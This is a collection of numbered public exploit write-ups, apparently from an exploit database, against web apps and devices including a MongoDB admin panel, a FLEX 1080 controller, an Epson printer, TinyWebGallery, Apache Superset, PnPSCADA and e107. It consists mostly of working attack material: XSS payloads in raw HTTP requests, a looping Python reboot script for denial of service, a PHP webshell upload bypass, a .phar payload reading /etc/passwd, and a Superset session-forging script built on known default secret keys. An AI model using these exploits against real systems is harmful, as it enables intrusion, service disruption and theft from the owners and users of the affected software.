      http://localhost/mongo/index.php?db=%3C%2Ffont%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cfont%3E&collection=startup_log&action=collection.index&format=json&criteria=%7B%0D%0A%0D%0A%7D&newobj=%7B%0D%0A%09%27%24set%27%3A+%7B%0D%0A%09%09%2F%2Fyour+attributes%0D%0A%09%7D%0D%0A%7D&field%5B%5D=_id&order%5B%5D=desc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&limit=0&pagesize=10&command=findAll

      http://localhost/mongo/index.php?db=local&collection=%3C%2Ffont%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cfont%3E&action=collection.index&format=json&criteria=%7B%0D%0A%0D%0A%7D&newobj=%7B%0D%0A%09%27%24set%27%3A+%7B%0D%0A%09%09%2F%2Fyour+attributes%0D%0A%09%7D%0D%0A%7D&field%5B%5D=_id&order%5B%5D=desc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&limit=0&pagesize=10&command=findAll

      http://localhost/mongo/index.php?db=local&collection=startup_log&action=collection.index&format=%27+onMouseOver%3D%27alert%281%29%3B&criteria=%7B%0D%0A%0D%0A%7D&newobj=%7B%0D%0A%09%27%24set%27%3A+%7B%0D%0A%09%09%2F%2Fyour+attributes%0D%0A%09%7D%0D%0A%7D&field%5B%5D=_id&order%5B%5D=desc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&limit=0&pagesize=10&command=findAll

      POST http://localhost/mongo/index.php?action=login.index&host=0 HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 109
      Origin: https://localhost
      Authorization: Basic cm9vdDpyb290
      Connection: keep-alive
      Referer: https://localhost/mongo/index.php?action=login.index&host=0
      Cookie: ROCK_LANG=es_es; PHPSESSID=tpaptf0gtmas344agj5ia6srl1; rock_format=json
      Upgrade-Insecure-Requests: 1
      Host: localhost

      more=0&host=0&username=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&password=****&db=&lang=es_es&expire=3

      POST http://localhost/mongo/index.php?action=server.command& HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 109
      Origin: https://localhost
      Authorization: Basic cm9vdDpyb290
      Connection: keep-alive
      Referer: https://localhost/mongo/index.php?action=server.command&
      Cookie: ROCK_LANG=es_es; PHPSESSID=tpaptf0gtmas344agj5ia6srl1; rock_format=json
      Upgrade-Insecure-Requests: 1
      Host: localhost

      command=%7B%0D%0A++listCommands%3A+1%0D%0A%7D&db=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&format=json

      POST http://localhost/mongo/index.php?action=server.execute& HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 140
      Origin: https://localhost
      Authorization: Basic cm9vdDpyb290
      Connection: keep-alive
      Referer: https://localhost/mongo/index.php?action=server.execute&
      Cookie: ROCK_LANG=es_es; PHPSESSID=tpaptf0gtmas344agj5ia6srl1; rock_format=json
      Upgrade-Insecure-Requests: 1
      Host: localhost

      code=function+%28%29+%7B%0D%0A+++var+plus+%3D+1+%2B+2%3B%0D%0A+++return+plus%3B%0D%0A%7D&db=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E
  14. # Exploit Title: FLEX 1080 < 1085 Web 1.6.0 - Denial of Service
# Date: 2023-05-06
# Exploit Author: Mr Empy
# Vendor Homepage: https://www.tem.ind.br/
# Software Link: https://www.tem.ind.br/?page=prod-detalhe&id=94
# Version: 1.6.0
# Tested on: Android
# CVE ID: CVE-2022-2591

#!/usr/bin/env python3

import requests
import re
import argparse
from colorama import Fore
import time


def main():
    def banner():
        print('''
    ________    _______  __
   / ____/ /   / ____/ |/ /
  / /_  / /   / __/  |   /
 / __/ / /___/ /___ /   |
/_/   /_____/_____//_/|_|

[FLEX 1080 < 1085 Web 1.6.0 - Denial of Service]
''')

    def reboot():
        r = requests.get(f'http://{arguments.target}/sistema/flash/reboot')
        if 'Rebooting' in r.text:
            pass
        else:
            print(f'{Fore.LIGHTRED_EX}[-] {Fore.LIGHTWHITE_EX}O hardware não é vulnerável')
            quit()

    banner()
    print(f'{Fore.LIGHTBLUE_EX}[*] {Fore.LIGHTWHITE_EX} Iniciando o ataque')
    while True:
        try:
            reboot()
            print(f'{Fore.LIGHTGREEN_EX}[+] {Fore.LIGHTWHITE_EX} Hardware derrubado com sucesso!')
            time.sleep(1)
        except:
            # print(f'{Fore.LIGHTRED_EX}[-] {Fore.LIGHTWHITE_EX}O hardware está inativo')
            pass


if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('-t', '--target', action='store', help='Target', dest='target', required=True)
    arguments = parser.parse_args()
    try:
        main()
    except KeyError:
        quit()
  15. # Exploit Title: Epson Stylus SX510W Printer Remote Power Off - Denial of Service (PoC)
# Discovery by: Rafael Pedrero
# Discovery Date: 2020-05-16
# Vendor Homepage: https://www.epson.es/
# Software Link : https://www.epson.es/products/printers/inkjet-printers/for-home/epson-stylus-sx510w
# Tested Version: EPSON_Linux UPnP/1.0 Epson UPnP SDK/1.0
# Tested on: Linux/Windows
# Vulnerability Type: Denial of Service (DoS)

1. Description

The vulnerability occurs when 2 or more &'s are sent in a row to the server ("/PRESENTATION/HTML/TOP/INDEX.HTML"), causing it to shut down.

2. Proof of Concept

Request:

curl -s "http://<printer_ip_address>/PRESENTATION/HTML/TOP/INDEX.HTML?RELOAD=&&tm=1589865865549"

3. Solution:

This product version is deprecated.
  16. # Exploit Title: Online Clinic Management System 2.2 - Multiple Stored Cross-Site Scripting (XSS)
# Date: 27-06-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://bigprof.com
# Software Download Link : https://bigprof.com/appgini/applications/online-clinic-management-system
# Version : 2.2
# Category: Webapps
# Tested on: Windows 7 64 Bits / Windows 10 64 Bits
# CVE :
# Category: webapps
# Vulnerability Type: Stored Cross-Site Scripting

1. Description

Online Clinic Management System 2.2 does not sufficiently encode user-controlled inputs, resulting in a stored Cross-Site Scripting (XSS) vulnerability via /clinic/medical_records_view.php, in the FirstRecord parameter, in both GET and POST requests.

2. Proof of Concept

GET:

http://127.0.0.1/clinic/medical_records_view.php?SelectedID=2&record-added-ok=5781&SortField=&SortDirection=&FirstRecord=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&DisplayRecords=all&SearchString=

POST:

POST http://127.0.0.1/clinic/medical_records_view.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: multipart/form-data; boundary=---------------------------1512016725878
Content-Length: 1172
Origin: https://127.0.0.1
Connection: keep-alive
Referer: https://127.0.0.1/clinic/medical_records_view.php
Cookie: online_clinic_management_system=bnl1ht0a4n7snalaoqgh8f85b4; online_clinic_management_system.dvp_expand=[%22tab_medical_records-patient%22%2C%22tab_events-name_patient%22]
Upgrade-Insecure-Requests: 1
Host: 127.0.0.1

-----------------------------1512016725878
Content-Disposition: form-data; name="current_view"

DVP
-----------------------------1512016725878
Content-Disposition: form-data; name="SortField"


-----------------------------1512016725878
Content-Disposition: form-data; name="SelectedID"

1
-----------------------------1512016725878
Content-Disposition: form-data; name="SelectedField"


-----------------------------1512016725878
Content-Disposition: form-data; name="SortDirection"


-----------------------------1512016725878
Content-Disposition: form-data; name="FirstRecord"

"><script>alert(1);</script>
-----------------------------1512016725878
Content-Disposition: form-data; name="NoDV"


-----------------------------1512016725878
Content-Disposition: form-data; name="PrintDV"


-----------------------------1512016725878
Content-Disposition: form-data; name="DisplayRecords"

all
-----------------------------1512016725878
Content-Disposition: form-data; name="patient"


-----------------------------1512016725878
Content-Disposition: form-data; name="SearchString"


-----------------------------1512016725878--

1. Description

Online Clinic Management System 2.2 does not sufficiently encode user-controlled inputs, resulting in a stored Cross-Site Scripting (XSS) vulnerability via /clinic/patients_view.php, in the FirstRecord parameter.

2. Proof of Concept

http://127.0.0.1/clinic/patients_view.php?SelectedID=1&record-added-ok=11536&SortField=&SortDirection=&FirstRecord=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&DisplayRecords=all&SearchString=

And Reflected Cross-Site Scripting (XSS) too.

# Vulnerability Type: Reflected Cross-Site Scripting

1. Description

Online Clinic Management System 2.2 does not sufficiently encode user-controlled inputs, resulting in a Reflected Cross-Site Scripting (XSS) vulnerability via /clinic/events_view.php, in the FirstRecord parameter.

2. Proof of Concept

http://127.0.0.1/clinic/events_view.php?SelectedID=2&record-added-ok=7758&SortField=&SortDirection=&FirstRecord=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&DisplayRecords=all&SearchString=

1. Description

Online Clinic Management System 2.2 does not sufficiently encode user-controlled inputs, resulting in a Reflected Cross-Site Scripting (XSS) vulnerability via /clinic/disease_symptoms_view.php, in the FirstRecord parameter.

2. Proof of Concept

http://127.0.0.1/clinic/disease_symptoms_view.php?SelectedID=1&record-added-ok=1096&SortField=&SortDirection=&FirstRecord=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&DisplayRecords=all&SearchString=
  17. # Exploit Title: Job Portal 1.0 - File Upload Restriction Bypass
# Date: 27-06-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://phpgurukul.com/job-portal-project/
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=7855
# Version: 1.0
# Tested on: Windows 7 64 Bits / Windows 10 64 Bits
# CVE :
# Category: webapps

1. Description

File Upload Restriction Bypass vulnerabilities were found in Job Portal 1.0. This allows an authenticated user to potentially obtain RCE via a webshell.

2. Proof of Concept

1. Go to the user profile >> (/jobportal/applicant/)
2. Select profile image and load a valid image.
3. Turn Burp/ZAP Intercept On
4. Select webshell - ex: shell.png
5. Alter the request in the upload... Update 'filename' to the desired extension. ex: shell.php
It is not necessary to change the content type from 'image/png'.

Example exploitation request:

====================================================================================================
POST http://127.0.0.1/jobportal/applicant/controller.php?action=photos HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: multipart/form-data; boundary=---------------------------57052814523281
Content-Length: 555
Origin: https://127.0.0.1
Connection: keep-alive
Referer: https://127.0.0.1/jobportal/applicant/index.php?view=view&id=
Cookie: PHPSESSID=qf9e02j0rda99cj91l36qcat34
Upgrade-Insecure-Requests: 1
Host: 127.0.0.1

-----------------------------57052814523281
Content-Disposition: form-data; name="MAX_FILE_SIZE"

1000000
-----------------------------57052814523281
Content-Disposition: form-data; name="photo"; filename="shell.php"
Content-Type: image/png

?PNG
...
<?php echo "<pre>";system($_REQUEST['cmd']);echo "</pre>" ?>
IEND
-----------------------------57052814523281
Content-Disposition: form-data; name="savephoto"


-----------------------------57052814523281--
====================================================================================================

6. Send the request and visit your new webshell

Ex: https://127.0.0.1/jobportal/applicant/photos/shell.php?cmd=whoami

nt authority\system

3. Solution:

Patch: https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload
  18. #Exploit Title: TinyWebGallery v2.5 - Stored Cross-Site Scripting (XSS)
#Application: TinyWebGallery
#Version: v2.5
#Bugs: Stored Xss
#Technology: PHP
#Vendor URL: http://www.tinywebgallery.com/
#Software Link: https://www.tinywebgallery.com/download.php?tinywebgallery=latest
#Date of found: 07-05-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux

2. Technical Details & POC
========================================

steps:

1. Login to account
2. Go to http://localhost/twg25/index.php?twg_album=3_youtube.com&twg_show=Q4IPe8_Bo7c.jpg
3. Edit
4. Set folder name section as <script>alert(4)</script>

Request :

POST /twg25/i_frames/i_titel.php HTTP/1.1
Host: localhost
Content-Length: 264
Cache-Control: max-age=0
sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: iframe
Referer: http://localhost/twg25/i_frames/i_titel.php?twg_album=3_youtube.com&twg_show=Q4IPe8_Bo7c.jpg
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=qc7mfbthpf7tnf32a34p8l766k
Connection: close

twg_album=3_youtube.com&twg_show=Q4IPe8_Bo7c.jpg&twg_foffset=&twg_submit=true&twg_titel_page2=true&twg_foldername_mod=1&twg_foldername=%26lt%3Bscript%26gt%3Balert%284%29%26lt%3B%2Fscript%26gt%3B&twg_folderdesc_mod=1&twg_folderdesc=aaaaaaaaaaaaaaaaa&twg_submit=Save

5. Go to http://localhost/twg25/index.php
  19. #Exploit Title: TinyWebGallery v2.5 - Remote Code Execution (RCE)
#Application: TinyWebGallery
#Version: v2.5
#Bugs: RCE
#Technology: PHP
#Vendor URL: http://www.tinywebgallery.com/
#Software Link: https://www.tinywebgallery.com/download.php?tinywebgallery=latest
#Date of found: 07-05-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux

2. Technical Details & POC
========================================

steps:

1. Go to upload image http://localhost/twg25/admin/index.php?action=upload&sview=no&menu=true
2. upload .phar file payload:

payload: <?php echo system("cat /etc/passwd"); ?>

3. go to file link

poc request:

POST /twg25/admin/index.php?action=upload&dir=&order=name&srt=yes&tview=no&sview=no&lang=en HTTP/1.1
Host: localhost
Content-Length: 2123
Cache-Control: max-age=0
sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary53rZRhJinqaMm7Ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/twg25/admin/index.php?action=upload&sview=no&menu=true
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=qc7mfbthpf7tnf32a34p8l766k
Connection: close

------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="token"

b2ed5512107a625ef9d5688ced296c61
------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="MAX_FILE_SIZE"

2097152
------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="confirm"

true
------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="userfile[]"; filename="shell.phar"
Content-Type: application/octet-stream

<?php echo system("cat /etc/passwd"); ?>
------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="twgsize"

100000
------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="twgquality"

80
------WebKitFormBoundary53rZRhJinqaMm7Ip--

http://localhost/twg25/pictures/shell.phar
  20. # Exploit Title: Optoma 1080PSTX Firmware C02 - Authentication Bypass
# Date: 2023/05/09
# Exploit Author: Anthony Cole
# Contact: http://twitter.com/acole76
# Website: http://twitter.com/acole76
# Vendor Homepage: http://optoma.com
# Version: Optoma 1080PSTX Firmware C02
# Tested on: N/A
# CVE : CVE-2023-27823

Details

By default the web interface of the 1080PSTX requires a username and password to access the application control panel. However, an attacker, on the same network, can bypass it by manually setting the "atop" cookie to the value of "1".

GET /index.asp HTTP/1.1
Host: projector
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: atop=1
Connection: close
  21. # Exploit Title: WordPress Plugin Backup Migration 1.2.8 - Unauthenticated Database Backup
# Google Dork: intitle:("Index of /wp-content/plugins/backup-backup") AND inurl:("plugins/backup-backup/")
# Date: 2023-05-10
# Exploit Author: Wadeek
# Vendor Homepage: https://backupbliss.com/
# Software Link: https://downloads.wordpress.org/plugin/backup-backup.1.2.8.zip
# Version: 1.2.8
# Tested on: WordPress 6.2

1) Get the version of the plugin.
=> GET /wp-content/plugins/backup-backup/readme.txt
--------------------------------------------------------------------------
Stable tag: 1.2.8
--------------------------------------------------------------------------

2) Get the name of the backup directory.
=> GET /wp-content/backup-migration/config.json
--------------------------------------------------------------------------
{
  [...],
  "STORAGE::LOCAL::PATH":"[...]/wp-content/backup-migration-xXxXxxXxXx",
  [...],
  "OTHER:EMAIL":"[email protected]"
}
--------------------------------------------------------------------------

3) Get the name of the archive containing the backups.
=> GET /wp-content/backup-migration/complete_logs.log
--------------------------------------------------------------------------
BM_Backup_YYYY-MM-DD_00_00_00_xXxXxxXxXxxXxXxx.zip
--------------------------------------------------------------------------

4) Build the path for the download.
=> GET /wp-content/backup-migration-xXxXxxXxXx/backups/BM_Backup_YYYY-MM-DD_00_00_00_xXxXxxXxXxxXxXxx.zip
  22. # Exploit Title: Authenticated Persistent XSS in Cameleon CMS 2.7.4
# Google Dork: intext:"Camaleon CMS is a free and open-source tool and a fexible content management system (CMS) based on Ruby on Rails"
# Date: 2023-10-05
# Exploit Author: Yasin Gergin
# Vendor Homepage: http://camaleon.tuzitio.com
# Software Link: https://github.com/owen2345/camaleon-cms
# Version: 2.7.4
# Tested on: Linux kali 6.1.0-kali7-amd64
# CVE : -

--- Description ---

http://127.0.0.1:3000/admin/login - Log in as an Admin

Under the Post tab click on "Create New"

While creating the post, set Title as "><svg/onmouseover=alert(document.cookie)>

http://127.0.0.1:3000/admin/post_type/2/posts - Post data will be sent to this url

-- POST DATA --

POST /admin/post_type/2/posts HTTP/1.1
Host: 127.0.0.1:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://127.0.0.1:3000/admin/post_type/2/posts/new
Content-Type: application/x-www-form-urlencoded
Content-Length: 666
Origin: http://127.0.0.1:3000
Connection: keep-alive
Cookie: _my_project_session=w4yj2Y%2FqHaXYDhwwBDnYsyQUc6AtLUnItJ3MGHBV1yS40xwTgjfvlBZVNgqKIvg1W58e0mxyW4OcBk0XwJRZ90j6SmCHG1KJG9ppBKk%2FdKGDboPCRBq40qKhHnkssRPCgRgIjs69EG7htSdUY%2Bbgit9XTESgvSusBBhsIED%2BLH0VBOBL6H%2FV4Mp59NEP7LhP%2FHmlulEa7I43J8HKpStDj2HiXxA5ZghvSkvpfQpN2d047jLhl71CUcW7pHxmJ4uAdY5ip5OTIhJG9TImps5TbIUrOHyE9vKp1LXzdmbNNi2GI5utUUsURLGUtaN7Fam3Kpi8IqEaBA%3D%3D--8ZKl2%2F6OzLCXn2qA--%2BtMhAwdbdfxNzoSPajkZrg%3D%3D; auth_token=iRDUqXfbhmibLIM5mrHelQ&Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A102.0%29+Gecko%2F20100101+Firefox%2F102.0&127.0.0.1; phpMyAdmin=4f5ad7484490645a49d171c03e15dab2; pma_lang=en
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

authenticity_token=vuAzhnu6UocDR6zpeeaQxvlVjdmIMr9LPrLEcK5FGVAEYQamLHI1fAG7jBQ3FwEX_ACWedzoX72WAUxqj5wKrQ&post%5Bdraft_id%5D=&post%5Bslug%5D=svgonmouseoveralertdocumentcookie&meta%5Bslug%5D=svgonmouseoveralertdocumentcookie&post%5Btitle%5D=%22%3E%3Csvg%2Fonmouseover%3Dalert%28document.cookie%29%3E&post%5Bcontent%5D=%3Cp%3Eqwe%3C%2Fp%3E&meta%5Bsummary%5D=qwe&options%5Bseo_title%5D=&options%5Bkeywords%5D=&options%5Bseo_description%5D=&options%5Bseo_author%5D=&options%5Bseo_image%5D=&options%5Bseo_canonical%5D=&commit=Create&post%5Bstatus%5D=published&meta%5Btemplate%5D=&meta%5Bhas_comments%5D=0&meta%5Bhas_comments%5D=1&categories%5B%5D=6&tags=&meta%5Bthumb%5D=

-- POST DATA --

Then view the post you've created by clicking on "View Page" and move your mouse cursor onto the post title. The XSS will pop up.
  23. # Exploit Title: Apache Superset 2.0.0 - Authentication Bypass
# Date: 10 May 2023
# Exploit Author: MaanVader
# Vendor Homepage: https://superset.apache.org/
# Version: Apache Superset<= 2.0.1
# Tested on: 2.0.0
# CVE: CVE-2023-27524

from flask_unsign import session
import requests
import urllib3
import argparse
import re
from time import sleep
from selenium import webdriver
from urllib.parse import urlparse

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

SECRET_KEYS = [
    b'\x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h',  # version < 1.4.1
    b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET',  # version >= 1.4.1
    b'thisISaSECRET_1234',  # deployment template
    b'YOUR_OWN_RANDOM_GENERATED_SECRET_KEY',  # documentation
    b'TEST_NON_DEV_SECRET'  # docker compose
]


def main():
    parser = argparse.ArgumentParser()
    parser.add_argument('--url', '-u', help='Base URL of Superset instance', required=True)
    parser.add_argument('--id', help='User ID to forge session cookie for, default=1', required=False, default='1')
    args = parser.parse_args()

    try:
        u = args.url.rstrip('/') + '/login/'
        headers = {
            'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0'
        }
        resp = requests.get(u, headers=headers, verify=False, timeout=30, allow_redirects=False)
        if resp.status_code != 200:
            print(f'Error retrieving login page at {u}, status code: {resp.status_code}')
            return

        session_cookie = None
        for c in resp.cookies:
            if c.name == 'session':
                session_cookie = c.value
                break
        if not session_cookie:
            print('Error: No session cookie found')
            return
        print(f'Got session cookie: {session_cookie}')

        try:
            decoded = session.decode(session_cookie)
            print(f'Decoded session cookie: {decoded}')
        except:
            print('Error: Not a Flask session cookie')
            return

        match = re.search(r'"version_string": "(.*?)&#34', resp.text)
        if match:
            version = match.group(1)
        else:
            version = 'Unknown'
        print(f'Superset Version: {version}')

        for i, k in enumerate(SECRET_KEYS):
            cracked = session.verify(session_cookie, k)
            if cracked:
                break
        if not cracked:
            print('Failed to crack session cookie')
            return

        print(f'Vulnerable to CVE-2023-27524 - Using default SECRET_KEY: {k}')

        try:
            user_id = int(args.id)
        except:
            user_id = args.id

        forged_cookie = session.sign({'_user_id': user_id, 'user_id': user_id}, k)
        print(f'Forged session cookie for user {user_id}: {forged_cookie}')

        u1 = args.url.rstrip('/') + '/superset/welcome'
        print(f"Now visit the url: `{u1}` and replace the current session cookie with this `{forged_cookie}` and refresh the page and we will be logged in as admin to the dashboard:)")
    except Exception as e:
        print(f'Unexpected error: {e}')


if __name__ == '__main__':
    main()
  24. # Exploit Title: PnPSCADA v2.x - Unauthenticated PostgreSQL Injection
# Date: 15/5/2023
# Exploit Author: Momen Eldawakhly (Cyber Guy) at Samurai Digital Security Ltd
# Vendor Homepage: https://pnpscada.com/
# Version: PnPSCADA (cross platforms): v2.x
# Tested on: Unix
# CVE : CVE-2023-1934
# Proof-of-Concept: https://drive.google.com/drive/u/0/folders/1r_HMoaU3P0t-04gMM90M0hfdBRi_P0_8

SQLi crashing point:

GET /hitlogcsv.isp?userids=1337'&startdate= 2022-12-138200083A0093A00&enddate=2022-12-138201383A1783A00 HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14
Host: vulnerablepnpscada.int
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
  25. # Exploit Title: e107 v2.3.2 - Reflected XSS
# Date: 11/05/2022
# Exploit Author: Hubert Wojciechowski
# Contact Author: [email protected]
# Vendor Homepage: https://e107.org/
# Software Link: https://e107.org/download
# Version: 2.3.2
# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

### XSS Reflected - unauthorized

URL: http://127.0.0.1/e107/e107_plugins/tinymce4/plugins/e107/parser.php
Parameters: content

# POC

Request:

POST /e107/e107_plugins/tinymce4/plugins/e107/parser.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 1126
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
Accept: text/html, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://127.0.0.1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1/e107/e107_admin/newspost.php?mode=main&action=edit&id=3
Accept-Encoding: gzip, deflate
Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

content=%5Bhtml%5D%3Cp%3E%3Cstrong%3ELore"/><script>alert(1)</script>bb&mode=tohtml

Response:

HTTP/1.1 200 OK
Date: Thu, 11 May 2023 19:38:45 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
X-Powered-By: PHP/7.4.29
Set-Cookie: PHPSESSID=c4mphnf1igb7lbibn4q1eni10h; expires=Fri, 12-May-2023 19:38:45 GMT; Max-Age=86400; path=/e107/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 1053
Connection: close
Content-Type: text/html; charset=UTF-8

<!-- bbcode-html-start --><p><strong>Lore"/><script>alert(1)</script>bb

### XSS Reflected - Authorized

URL: http://127.0.0.1/e107/e107_admin/image.php
Parameters: for

# POC 1

Request:

GET /e107/e107_admin/image.php?mode=main&action=dialog&for=_commonh5it1%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253edezaw&tagid=media-cat-image&iframe=1&w=206&image=1 HTTP/1.1
Host: 127.0.0.1
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
